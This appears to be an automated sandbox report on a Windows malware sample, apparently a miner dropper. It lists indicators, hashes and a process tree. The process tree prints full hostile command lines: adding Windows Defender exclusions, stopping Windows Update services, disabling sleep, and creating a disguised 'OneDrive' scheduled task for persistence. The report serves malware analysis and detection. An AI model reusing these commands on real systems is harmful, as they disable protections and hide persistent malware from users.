Analysis
-
max time kernel
151s -
max time network
155s -
platform
windows7_x64 -
resource
win7-20230220-en -
resource tags
arch:x64arch:x86image:win7-20230220-enlocale:en-usos:windows7-x64system -
submitted
11-05-2023 18:40
Static task
static1
Behavioral task
behavioral1
Sample
ce9bd1a5c1fc599b0c8f877d229482ffa413d8dd7f51eda86c1d3a59de6280b5.exe
Resource
win7-20230220-en
Behavioral task
behavioral2
Sample
ce9bd1a5c1fc599b0c8f877d229482ffa413d8dd7f51eda86c1d3a59de6280b5.exe
Resource
win10v2004-20230220-en
General
-
Target
ce9bd1a5c1fc599b0c8f877d229482ffa413d8dd7f51eda86c1d3a59de6280b5.exe
-
Size
8.7MB
-
MD5
6a38b46d48afeae349b698a429ae1e1c
-
SHA1
891c831af6e60cfded62268276e4ffffd203f27e
-
SHA256
ce9bd1a5c1fc599b0c8f877d229482ffa413d8dd7f51eda86c1d3a59de6280b5
-
SHA512
470ae81eb635aa4b50b3213544ce85de16b87eaba8cf0fa46ca00989df2fa88fcadb1d834c58a5a7d84b3718515f6fd359a9a946035222b944b3df3e7b87bdf5
-
SSDEEP
196608:kxKMARSuV2XJXf6hzsy07g1vse0yEn2ii+Iv5tUOX:/FRSJXlf6Z8gWnyiqxtN
Malware Config
Signatures
-
Suspicious use of NtCreateUserProcessOtherParentProcess 12 IoCs
description pid Process procid_target PID 1544 created 1288 1544 ce9bd1a5c1fc599b0c8f877d229482ffa413d8dd7f51eda86c1d3a59de6280b5.exe 15 PID 1544 created 1288 1544 ce9bd1a5c1fc599b0c8f877d229482ffa413d8dd7f51eda86c1d3a59de6280b5.exe 15 PID 1544 created 1288 1544 ce9bd1a5c1fc599b0c8f877d229482ffa413d8dd7f51eda86c1d3a59de6280b5.exe 15 PID 1544 created 1288 1544 ce9bd1a5c1fc599b0c8f877d229482ffa413d8dd7f51eda86c1d3a59de6280b5.exe 15 PID 1544 created 1288 1544 ce9bd1a5c1fc599b0c8f877d229482ffa413d8dd7f51eda86c1d3a59de6280b5.exe 15 PID 1544 created 1288 1544 ce9bd1a5c1fc599b0c8f877d229482ffa413d8dd7f51eda86c1d3a59de6280b5.exe 15 PID 396 created 1288 396 OneDrive.exe 15 PID 396 created 1288 396 OneDrive.exe 15 PID 396 created 1288 396 OneDrive.exe 15 PID 396 created 1288 396 OneDrive.exe 15 PID 396 created 1288 396 OneDrive.exe 15 PID 396 created 1288 396 OneDrive.exe 15 -
Sets service image path in registry 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\WinRing0_1_2_0\ImagePath = "\\??\\C:\\Users\\Admin\\AppData\\Roaming\\Google\\Libs\\WR64.sys" services.exe -
Stops running service(s) 3 TTPs
-
Checks BIOS information in registry 2 TTPs 4 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion ce9bd1a5c1fc599b0c8f877d229482ffa413d8dd7f51eda86c1d3a59de6280b5.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion ce9bd1a5c1fc599b0c8f877d229482ffa413d8dd7f51eda86c1d3a59de6280b5.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion OneDrive.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion OneDrive.exe -
Executes dropped EXE 1 IoCs
pid Process 396 OneDrive.exe -
Loads dropped DLL 1 IoCs
pid Process 1892 taskeng.exe -
Drops file in System32 directory 5 IoCs
description ioc Process File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\System32\Tasks\OneDrive svchost.exe -
Suspicious use of SetThreadContext 3 IoCs
description pid Process procid_target PID 1544 set thread context of 948 1544 ce9bd1a5c1fc599b0c8f877d229482ffa413d8dd7f51eda86c1d3a59de6280b5.exe 40 PID 396 set thread context of 700 396 OneDrive.exe 66 PID 396 set thread context of 1296 396 OneDrive.exe 70 -
Launches sc.exe 10 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 1644 sc.exe 1684 sc.exe 536 sc.exe 1824 sc.exe 552 sc.exe 1756 sc.exe 1080 sc.exe 1540 sc.exe 1600 sc.exe 1472 sc.exe -
Checks processor information in registry 2 TTPs 6 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 wmiprvse.exe Key queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 wmiprvse.exe Key security queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 wmiprvse.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Component Information wmiprvse.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString wmiprvse.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier wmiprvse.exe -
Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 1532 schtasks.exe 1700 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 1544 ce9bd1a5c1fc599b0c8f877d229482ffa413d8dd7f51eda86c1d3a59de6280b5.exe 1544 ce9bd1a5c1fc599b0c8f877d229482ffa413d8dd7f51eda86c1d3a59de6280b5.exe 1484 powershell.exe 1544 ce9bd1a5c1fc599b0c8f877d229482ffa413d8dd7f51eda86c1d3a59de6280b5.exe 1544 ce9bd1a5c1fc599b0c8f877d229482ffa413d8dd7f51eda86c1d3a59de6280b5.exe 1544 ce9bd1a5c1fc599b0c8f877d229482ffa413d8dd7f51eda86c1d3a59de6280b5.exe 1544 ce9bd1a5c1fc599b0c8f877d229482ffa413d8dd7f51eda86c1d3a59de6280b5.exe 1544 ce9bd1a5c1fc599b0c8f877d229482ffa413d8dd7f51eda86c1d3a59de6280b5.exe 1544 ce9bd1a5c1fc599b0c8f877d229482ffa413d8dd7f51eda86c1d3a59de6280b5.exe 1544 ce9bd1a5c1fc599b0c8f877d229482ffa413d8dd7f51eda86c1d3a59de6280b5.exe 1544 ce9bd1a5c1fc599b0c8f877d229482ffa413d8dd7f51eda86c1d3a59de6280b5.exe 1612 powershell.exe 948 dialer.exe 948 dialer.exe 948 dialer.exe 948 dialer.exe 1544 ce9bd1a5c1fc599b0c8f877d229482ffa413d8dd7f51eda86c1d3a59de6280b5.exe 1544 ce9bd1a5c1fc599b0c8f877d229482ffa413d8dd7f51eda86c1d3a59de6280b5.exe 396 OneDrive.exe 396 OneDrive.exe 948 dialer.exe 948 dialer.exe 948 dialer.exe 948 dialer.exe 1580 powershell.exe 948 dialer.exe 948 dialer.exe 948 dialer.exe 948 dialer.exe 396 OneDrive.exe 396 OneDrive.exe 948 dialer.exe 948 dialer.exe 948 dialer.exe 948 dialer.exe 948 dialer.exe 948 dialer.exe 948 dialer.exe 948 dialer.exe 948 dialer.exe 948 dialer.exe 948 dialer.exe 948 dialer.exe 948 dialer.exe 948 dialer.exe 948 dialer.exe 948 dialer.exe 948 dialer.exe 948 dialer.exe 948 dialer.exe 948 dialer.exe 948 dialer.exe 948 dialer.exe 396 OneDrive.exe 396 OneDrive.exe 948 dialer.exe 948 dialer.exe 948 dialer.exe 948 dialer.exe 948 dialer.exe 948 dialer.exe 948 dialer.exe 948 dialer.exe 948 dialer.exe -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
pid Process 1288 Explorer.EXE -
Suspicious behavior: LoadsDriver 1 IoCs
pid Process 464 services.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 1484 powershell.exe Token: SeShutdownPrivilege 1904 powercfg.exe Token: SeDebugPrivilege 1612 powershell.exe Token: SeShutdownPrivilege 1948 powercfg.exe Token: SeDebugPrivilege 948 dialer.exe Token: SeShutdownPrivilege 1308 powercfg.exe Token: SeShutdownPrivilege 1540 powercfg.exe Token: SeAuditPrivilege 856 svchost.exe Token: SeDebugPrivilege 1580 powershell.exe Token: SeShutdownPrivilege 1704 powercfg.exe Token: SeShutdownPrivilege 572 powercfg.exe Token: SeShutdownPrivilege 800 powercfg.exe Token: SeShutdownPrivilege 1632 powercfg.exe Token: SeDebugPrivilege 700 dialer.exe Token: SeAuditPrivilege 856 svchost.exe Token: SeDebugPrivilege 788 powershell.exe Token: SeLockMemoryPrivilege 1296 dialer.exe Token: SeLockMemoryPrivilege 1296 dialer.exe Token: SeAssignPrimaryTokenPrivilege 856 svchost.exe Token: SeIncreaseQuotaPrivilege 856 svchost.exe Token: SeSecurityPrivilege 856 svchost.exe Token: SeTakeOwnershipPrivilege 856 svchost.exe Token: SeLoadDriverPrivilege 856 svchost.exe Token: SeSystemtimePrivilege 856 svchost.exe Token: SeBackupPrivilege 856 svchost.exe Token: SeRestorePrivilege 856 svchost.exe Token: SeShutdownPrivilege 856 svchost.exe Token: SeSystemEnvironmentPrivilege 856 svchost.exe Token: SeUndockPrivilege 856 svchost.exe Token: SeManageVolumePrivilege 856 svchost.exe Token: SeAssignPrimaryTokenPrivilege 856 svchost.exe Token: SeIncreaseQuotaPrivilege 856 svchost.exe Token: SeSecurityPrivilege 856 svchost.exe Token: SeTakeOwnershipPrivilege 856 svchost.exe Token: SeLoadDriverPrivilege 856 svchost.exe Token: SeSystemtimePrivilege 856 svchost.exe Token: SeBackupPrivilege 856 svchost.exe Token: SeRestorePrivilege 856 svchost.exe Token: SeShutdownPrivilege 856 svchost.exe Token: SeSystemEnvironmentPrivilege 856 svchost.exe Token: SeUndockPrivilege 856 svchost.exe Token: SeManageVolumePrivilege 856 svchost.exe Token: SeAssignPrimaryTokenPrivilege 856 svchost.exe Token: SeIncreaseQuotaPrivilege 856 svchost.exe Token: SeSecurityPrivilege 856 svchost.exe Token: SeTakeOwnershipPrivilege 856 svchost.exe Token: SeLoadDriverPrivilege 856 svchost.exe Token: SeSystemtimePrivilege 856 svchost.exe Token: SeBackupPrivilege 856 svchost.exe Token: SeRestorePrivilege 856 svchost.exe Token: SeShutdownPrivilege 856 svchost.exe Token: SeSystemEnvironmentPrivilege 856 svchost.exe Token: SeUndockPrivilege 856 svchost.exe Token: SeManageVolumePrivilege 856 svchost.exe Token: SeAssignPrimaryTokenPrivilege 856 svchost.exe Token: SeIncreaseQuotaPrivilege 856 svchost.exe Token: SeSecurityPrivilege 856 svchost.exe Token: SeTakeOwnershipPrivilege 856 svchost.exe Token: SeLoadDriverPrivilege 856 svchost.exe Token: SeSystemtimePrivilege 856 svchost.exe Token: SeBackupPrivilege 856 svchost.exe Token: SeRestorePrivilege 856 svchost.exe Token: SeShutdownPrivilege 856 svchost.exe Token: SeSystemEnvironmentPrivilege 856 svchost.exe -
Suspicious use of FindShellTrayWindow 54 IoCs
pid Process 1296 dialer.exe 1296 dialer.exe 1288 Explorer.EXE 1288 Explorer.EXE 1296 dialer.exe 1296 dialer.exe 1296 dialer.exe 1296 dialer.exe 1296 dialer.exe 1296 dialer.exe 1296 dialer.exe 1296 dialer.exe 1296 dialer.exe 1296 dialer.exe 1296 dialer.exe 1296 dialer.exe 1296 dialer.exe 1296 dialer.exe 1296 dialer.exe 1296 dialer.exe 1296 dialer.exe 1296 dialer.exe 1296 dialer.exe 1296 dialer.exe 1296 dialer.exe 1296 dialer.exe 1296 dialer.exe 1296 dialer.exe 1296 dialer.exe 1296 dialer.exe 1296 dialer.exe 1296 dialer.exe 1296 dialer.exe 1296 dialer.exe 1296 dialer.exe 1296 dialer.exe 1296 dialer.exe 1296 dialer.exe 1296 dialer.exe 1296 dialer.exe 1296 dialer.exe 1296 dialer.exe 1296 dialer.exe 1296 dialer.exe 1296 dialer.exe 1296 dialer.exe 1296 dialer.exe 1296 dialer.exe 1296 dialer.exe 1296 dialer.exe 1296 dialer.exe 1296 dialer.exe 1296 dialer.exe 1296 dialer.exe -
Suspicious use of SendNotifyMessage 54 IoCs
pid Process 1296 dialer.exe 1296 dialer.exe 1288 Explorer.EXE 1288 Explorer.EXE 1296 dialer.exe 1296 dialer.exe 1296 dialer.exe 1296 dialer.exe 1296 dialer.exe 1296 dialer.exe 1296 dialer.exe 1296 dialer.exe 1296 dialer.exe 1296 dialer.exe 1296 dialer.exe 1296 dialer.exe 1296 dialer.exe 1296 dialer.exe 1296 dialer.exe 1296 dialer.exe 1296 dialer.exe 1296 dialer.exe 1296 dialer.exe 1296 dialer.exe 1296 dialer.exe 1296 dialer.exe 1296 dialer.exe 1296 dialer.exe 1296 dialer.exe 1296 dialer.exe 1296 dialer.exe 1296 dialer.exe 1296 dialer.exe 1296 dialer.exe 1296 dialer.exe 1296 dialer.exe 1296 dialer.exe 1296 dialer.exe 1296 dialer.exe 1296 dialer.exe 1296 dialer.exe 1296 dialer.exe 1296 dialer.exe 1296 dialer.exe 1296 dialer.exe 1296 dialer.exe 1296 dialer.exe 1296 dialer.exe 1296 dialer.exe 1296 dialer.exe 1296 dialer.exe 1296 dialer.exe 1296 dialer.exe 1296 dialer.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 816 wrote to memory of 1824 816 cmd.exe 32 PID 816 wrote to memory of 1824 816 cmd.exe 32 PID 816 wrote to memory of 1824 816 cmd.exe 32 PID 816 wrote to memory of 552 816 cmd.exe 33 PID 816 wrote to memory of 552 816 cmd.exe 33 PID 816 wrote to memory of 552 816 cmd.exe 33 PID 816 wrote to memory of 1756 816 cmd.exe 34 PID 816 wrote to memory of 1756 816 cmd.exe 34 PID 816 wrote to memory of 1756 816 cmd.exe 34 PID 816 wrote to memory of 1644 816 cmd.exe 35 PID 816 wrote to memory of 1644 816 cmd.exe 35 PID 816 wrote to memory of 1644 816 cmd.exe 35 PID 816 wrote to memory of 1684 816 cmd.exe 36 PID 816 wrote to memory of 1684 816 cmd.exe 36 PID 816 wrote to memory of 1684 816 cmd.exe 36 PID 1544 wrote to memory of 948 1544 ce9bd1a5c1fc599b0c8f877d229482ffa413d8dd7f51eda86c1d3a59de6280b5.exe 40 PID 108 wrote to memory of 1904 108 cmd.exe 42 PID 108 wrote to memory of 1904 108 cmd.exe 42 PID 108 wrote to memory of 1904 108 cmd.exe 42 PID 108 wrote to memory of 1948 108 cmd.exe 43 PID 108 wrote to memory of 1948 108 cmd.exe 43 PID 108 wrote to memory of 1948 108 cmd.exe 43 PID 108 wrote to memory of 1308 108 cmd.exe 44 PID 108 wrote to memory of 1308 108 cmd.exe 44 PID 108 wrote to memory of 1308 108 cmd.exe 44 PID 108 wrote to memory of 1540 108 cmd.exe 45 PID 108 wrote to memory of 1540 108 cmd.exe 45 PID 108 wrote to memory of 1540 108 cmd.exe 45 PID 948 wrote to memory of 420 948 dialer.exe 3 PID 948 wrote to memory of 464 948 dialer.exe 2 PID 1612 wrote to memory of 1532 1612 powershell.exe 46 PID 1612 wrote to memory of 1532 1612 powershell.exe 46 PID 1612 wrote to memory of 1532 1612 powershell.exe 46 PID 948 wrote to memory of 480 948 dialer.exe 1 PID 948 wrote to memory of 488 948 dialer.exe 8 PID 948 wrote to memory of 600 948 dialer.exe 26 PID 1892 wrote to memory of 396 1892 taskeng.exe 50 PID 1892 wrote to memory of 396 1892 taskeng.exe 50 PID 1892 wrote to memory of 396 1892 taskeng.exe 50 PID 948 wrote to memory of 680 948 dialer.exe 25 PID 948 wrote to memory of 768 948 dialer.exe 24 PID 948 wrote to memory of 820 948 dialer.exe 23 PID 948 wrote to memory of 856 948 dialer.exe 22 PID 948 wrote to memory of 968 948 dialer.exe 21 PID 948 wrote to memory of 272 948 dialer.exe 20 PID 948 wrote to memory of 328 948 dialer.exe 19 PID 948 wrote to memory of 1052 948 dialer.exe 18 PID 948 wrote to memory of 1152 948 dialer.exe 17 PID 948 wrote to memory of 1252 948 dialer.exe 16 PID 948 wrote to memory of 1288 948 dialer.exe 15 PID 948 wrote to memory of 288 948 dialer.exe 14 PID 948 wrote to memory of 1100 948 dialer.exe 13 PID 948 wrote to memory of 1980 948 dialer.exe 12 PID 948 wrote to memory of 1892 948 dialer.exe 49 PID 948 wrote to memory of 396 948 dialer.exe 50 PID 948 wrote to memory of 756 948 dialer.exe 52 PID 1716 wrote to memory of 536 1716 cmd.exe 55 PID 1716 wrote to memory of 536 1716 cmd.exe 55 PID 1716 wrote to memory of 536 1716 cmd.exe 55 PID 1716 wrote to memory of 1080 1716 cmd.exe 56 PID 1716 wrote to memory of 1080 1716 cmd.exe 56 PID 1716 wrote to memory of 1080 1716 cmd.exe 56 PID 1716 wrote to memory of 1540 1716 cmd.exe 57 PID 1716 wrote to memory of 1540 1716 cmd.exe 57 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Windows\system32\lsass.exeC:\Windows\system32\lsass.exe1⤵PID:480
-
C:\Windows\system32\services.exeC:\Windows\system32\services.exe1⤵
- Sets service image path in registry
- Suspicious behavior: LoadsDriver
PID:464 -
C:\Windows\system32\sppsvc.exeC:\Windows\system32\sppsvc.exe2⤵PID:1100
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation2⤵PID:288
-
-
C:\Windows\system32\taskhost.exe"taskhost.exe"2⤵PID:1152
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNoNetwork2⤵PID:1052
-
-
C:\Windows\System32\spoolsv.exeC:\Windows\System32\spoolsv.exe2⤵PID:328
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService2⤵PID:272
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService2⤵PID:968
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs2⤵
- Drops file in System32 directory
- Suspicious use of AdjustPrivilegeToken
PID:856 -
C:\Windows\system32\taskeng.exetaskeng.exe {F045195A-1C0F-4A10-964C-D241C9C5B272} S-1-5-21-3948302646-268491222-1934009652-1000:KXZDHPUW\Admin:Interactive:[1]3⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1892 -
C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exeC:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe4⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Checks BIOS information in registry
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
PID:396
-
-
-
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted2⤵PID:820
-
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted2⤵PID:768
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k RPCSS2⤵PID:680
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch2⤵PID:600
-
C:\Windows\system32\wbem\wmiprvse.exeC:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding3⤵
- Checks processor information in registry
PID:608
-
-
-
C:\Windows\system32\winlogon.exewinlogon.exe1⤵PID:420
-
C:\Windows\system32\lsm.exeC:\Windows\system32\lsm.exe1⤵PID:488
-
\\?\C:\Windows\system32\wbem\WMIADAP.EXEwmiadap.exe /F /T /R1⤵PID:1980
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:1288 -
C:\Users\Admin\AppData\Local\Temp\ce9bd1a5c1fc599b0c8f877d229482ffa413d8dd7f51eda86c1d3a59de6280b5.exe"C:\Users\Admin\AppData\Local\Temp\ce9bd1a5c1fc599b0c8f877d229482ffa413d8dd7f51eda86c1d3a59de6280b5.exe"2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Checks BIOS information in registry
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:1544
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1484
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc2⤵
- Suspicious use of WriteProcessMemory
PID:816 -
C:\Windows\System32\sc.exesc stop UsoSvc3⤵
- Launches sc.exe
PID:1824
-
-
C:\Windows\System32\sc.exesc stop WaaSMedicSvc3⤵
- Launches sc.exe
PID:552
-
-
C:\Windows\System32\sc.exesc stop wuauserv3⤵
- Launches sc.exe
PID:1756
-
-
C:\Windows\System32\sc.exesc stop bits3⤵
- Launches sc.exe
PID:1644
-
-
C:\Windows\System32\sc.exesc stop dosvc3⤵
- Launches sc.exe
PID:1684
-
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 02⤵
- Suspicious use of WriteProcessMemory
PID:108 -
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-ac 03⤵
- Suspicious use of AdjustPrivilegeToken
PID:1904
-
-
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-dc 03⤵
- Suspicious use of AdjustPrivilegeToken
PID:1948
-
-
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-ac 03⤵
- Suspicious use of AdjustPrivilegeToken
PID:1308
-
-
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-dc 03⤵
- Suspicious use of AdjustPrivilegeToken
PID:1540
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#yramilr#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'OneDrive' /tr '''C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'OneDrive' -RunLevel 'Highest' -Force; }2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1612 -
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /tn OneDrive /tr 'C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe'3⤵
- Creates scheduled task(s)
PID:1532
-
-
-
C:\Windows\System32\dialer.exeC:\Windows\System32\dialer.exe2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:948
-
-
C:\Windows\System32\schtasks.exeC:\Windows\System32\schtasks.exe /run /tn "OneDrive"2⤵PID:1888
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1580
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc2⤵
- Suspicious use of WriteProcessMemory
PID:1716 -
C:\Windows\System32\sc.exesc stop UsoSvc3⤵
- Launches sc.exe
PID:536
-
-
C:\Windows\System32\sc.exesc stop WaaSMedicSvc3⤵
- Launches sc.exe
PID:1080
-
-
C:\Windows\System32\sc.exesc stop wuauserv3⤵
- Launches sc.exe
PID:1540
-
-
C:\Windows\System32\sc.exesc stop bits3⤵
- Launches sc.exe
PID:1600
-
-
C:\Windows\System32\sc.exesc stop dosvc3⤵
- Launches sc.exe
PID:1472
-
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 02⤵PID:1180
-
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-ac 03⤵
- Suspicious use of AdjustPrivilegeToken
PID:1704
-
-
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-dc 03⤵
- Suspicious use of AdjustPrivilegeToken
PID:572
-
-
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-ac 03⤵
- Suspicious use of AdjustPrivilegeToken
PID:800
-
-
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-dc 03⤵
- Suspicious use of AdjustPrivilegeToken
PID:1632
-
-
-
C:\Windows\System32\dialer.exeC:\Windows\System32\dialer.exe2⤵
- Suspicious use of AdjustPrivilegeToken
PID:700
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#yramilr#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'OneDrive' /tr '''C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'OneDrive' -RunLevel 'Highest' -Force; }2⤵
- Drops file in System32 directory
- Suspicious use of AdjustPrivilegeToken
PID:788 -
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /tn OneDrive /tr 'C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe'3⤵
- Creates scheduled task(s)
PID:1700
-
-
-
C:\Windows\System32\dialer.exeC:\Windows\System32\dialer.exe2⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:1296
-
-
C:\Windows\system32\Dwm.exe"C:\Windows\system32\Dwm.exe"1⤵PID:1252
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "720787984-72106867474654626991753074968666716976304999-630301482-1612607737"1⤵PID:756
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "1163116055-1005637880112183784-1210579913-1790766172-1387358176-597930934-1070810164"1⤵PID:1032
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-1220541013-1817205616-12193343761003502801115961555-405457445-1956852630885357206"1⤵PID:1284
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "679894414-17257104491027471997-447241530-1728317811-1215181388-13842250381299782200"1⤵PID:1472
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD58cb40f34f0f54e9c3acc54881aa54264
SHA15bcf32161990f0ff3d00027715f419a706aa4f16
SHA256f478f9f25c4f839aec73e08ec5331c1d85ad68801a8c2dc0ccd53e0b7b3f7e52
SHA5120d8e77b24f40cedb83eb138bf6a2c1567b1f3ef29baa2e267bb658f863784d6477c1be9b7bd80a58c2093da44e1ee1b5cd01cbcd9bad5364eb1aaae239b317cf
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD58cb40f34f0f54e9c3acc54881aa54264
SHA15bcf32161990f0ff3d00027715f419a706aa4f16
SHA256f478f9f25c4f839aec73e08ec5331c1d85ad68801a8c2dc0ccd53e0b7b3f7e52
SHA5120d8e77b24f40cedb83eb138bf6a2c1567b1f3ef29baa2e267bb658f863784d6477c1be9b7bd80a58c2093da44e1ee1b5cd01cbcd9bad5364eb1aaae239b317cf
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD58cb40f34f0f54e9c3acc54881aa54264
